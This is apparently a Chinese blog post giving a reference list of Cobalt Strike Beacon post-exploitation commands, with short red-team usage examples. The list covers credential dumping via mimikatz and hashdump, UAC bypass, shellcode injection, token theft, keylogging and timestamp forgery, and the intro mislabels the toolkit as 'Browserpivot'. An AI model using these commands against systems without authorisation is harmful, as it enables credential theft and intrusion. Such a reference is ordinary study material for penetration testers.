cobalt strike指令

本文详细描述了一款恶意软件工具包Browserpivot的功能,包括浏览器注入、权限提升、文件操作、网络通信、密码获取、远程控制等技术,展示了黑客可能使用的多种攻击手段和操作方法。

browserpivot----------- 注入受害者浏览器进程
sleep 3 -----------全部命令3秒执行
bypassuac -----------绕过UAC
cancel -----------取消正在进行的下载
cd -----------切换目录
checkin -----------强制让被控端回连一次
clear -----------清除beacon内部的任务队列
connect Connect to a Beacon peerover TCP
covertvpn----------- 部署Covert VPN客户端
cp -----------复制文件
dcsync -----------从DC中提取密码哈希
desktop -----------远程VNC
dllinject -----------反射DLL注入进程
dllload -----------使用LoadLibrary将DLL加载到进程中
download -----------下载文件
downloads----------- 列出正在进行的文件下载
drives -----------列出目标盘符
elevate -----------尝试提权
execute -----------在目标上执行程序(无输出)
execute-assembly----------- 在目标上内存中执行本地.NET程序
exit -----------退出beacon
getprivs Enable system privileges oncurrent token
getsystem -----------尝试获取SYSTEM权限
getuid -----------获取用户ID
hashdump -----------转储密码哈希值
help-----------帮助
inject -----------在特定进程中生成会话
jobkill -----------杀死一个后台任务
jobs -----------列出后台任务
kerberos_ccache_use 从ccache-----------文件中导入票据应用于此会话
kerberos_ticket_purge -----------清除当前会话的票据
kerberos_ticket_use -----------从ticket文件中导入票据应用于此会话
keylogger -----------键盘记录
kill -----------结束进程
link Connect to a Beacon peerover a named pipe
logonpasswords -----------使用mimikatz转储凭据和哈希值
ls -----------列出文件
make_token -----------创建令牌以传递凭据
mimikatz----------- 运行mimikatz
mkdir -----------创建一个目录
mode dns -----------使用DNS A作为通信通道(仅限DNS beacon)
mode dns-txt -----------使用DNS TXT作为通信通道(仅限D beacon)
mode dns6 -----------使用DNS AAAA作为通信通道(仅限DNS beacon)
mode http----------- 使用HTTP作为通信通道
mv -----------移动文件
net net-----------命令
note -----------备注
portscan -----------进行端口扫描
powerpick----------- 通过Unmanaged PowerShell执行命令
powershell----------- 通过powershell.exe执行命令
powershell-import----------- 导入powershell脚本
ppid Set parent PID forspawned post-ex jobs
ps -----------显示进程列表
psexec Use a service to spawn asession on a host
psexec_psh Use PowerShell to spawn asession on a host
psinject -----------在特定进程中执行PowerShell命令
pth -----------使用Mimikatz进行传递哈希
pwd -----------当前目录位置
reg Query the registry
rev2self -----------恢复原始令牌
rm -----------删除文件或文件夹
rportfwd-----------端口转发
run -----------在目标上执行程序(返回输出)
runas -----------以另一个用户权限执行程序
runasadmin -----------在高权限下执行程序
runu Execute a program underanother PID
screenshot -----------屏幕截图
setenv -----------设置环境变量
shell cmd.exe  -----------打开cmd终端
shell ipconfig -----------执行ipconfig命令
shinject -----------将shellcode注入进程
shspawn -----------生成进程并将shellcode注入其中
sleep -----------设置睡眠延迟时间
socks -----------启动SOCKS4代理
socks stop -----------停止SOCKS4
spawn Spawn a session
spawnas Spawn a session as anotheruser
spawnto Set executable tospawn processes into
spawnu Spawn a session underanother PID
ssh----------- 使用ssh连接远程主机
ssh-key -----------使用密钥连接远程主机
steal_token----------- 从进程中窃取令牌
timestomp -----------将一个文件时间戳应用到另一个文件
unlink Disconnect from parentBeacon
upload -----------上传文件
wdigest----------- 使用mimikatz转储明文凭据
winrm -----------使用WinRM在主机上生成会话
wmi----------- 使用WMI在主机上生成会话
argue -----------进程参数欺骗

### Cobalt Strike 常用命令列表及使用方法 #### 修改回连时间 `sleep` 是用于调整 Beacon 的休眠间隔,即控制Beacon向服务器发送数据的时间频率。这有助于减少检测风险并优化网络流量。 ```bash sleep 10 # 设置每10秒回连一次 ``` 此命令对于长期驻留或低带宽环境下的操作尤为重要[^3]。 #### 查看当前权限级别 通过 `getuid` 来获取当前 Beacon 所处进程的身份信息,这对于评估后续提权策略至关重要。 ```bash getuid # 显示当前beacon运行的身份 ``` 了解正在使用的账户是否有足够的权限来执行特定的任务是非常必要的。 #### 文件下载与上传 为了实现横向移动或是持久化配置,可以利用以下两个命令来进行远程主机上的文件传输: - 下载远端文件至本地: ```bash download /path/to/remote/file.txt C:\local\destination\ ``` - 将本地文件上载到目标机器: ```bash upload "C:\source\file.exe" c:\target\directory\ ``` 这些功能允许攻击者灵活地管理不同系统间的资源交换[^4]。 #### 进程交互 能够枚举和注入其他进程中是重要的后渗透技巧之一。以下是几个常用的进程相关指令: - 列出所有活动中的进程及其详情: ```bash ps # 展示所有正在运行的程序列表 ``` - 向指定PID对应的进程中注入shellcode或其他payloads: ```bash spawn 1234 calc.exe # 在ID为1234的进程中启动计算器应用作为示范 inject 5678 shellcode # 把自定义的有效负载植入给定的进程中 ``` 掌握如何高效地操控受感染系统的各个组件可以帮助更好地完成任务[^1]。 #### 网络侦察 收集有关内部网络结构的信息也是必不可少的一部分工作流程。这里介绍一些基础性的网络探索命令: - 获取本机IP地址和其他网络接口设置: ```bash ifconfig # 类似于Windows里的ipconfig命令 ``` - 对内网范围内的其它设备发起ping请求测试连接状态: ```bash ping 192.168.1.x # 测试到达某台主机的可达性和延迟情况 portscan 192.168.1.0/24 tcp 22,80,443 # TCP扫描子网上开放的服务端口 ``` 上述技能使得红队成员能够在复杂的企业环境中导航并发现潜在漏洞点[^2]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值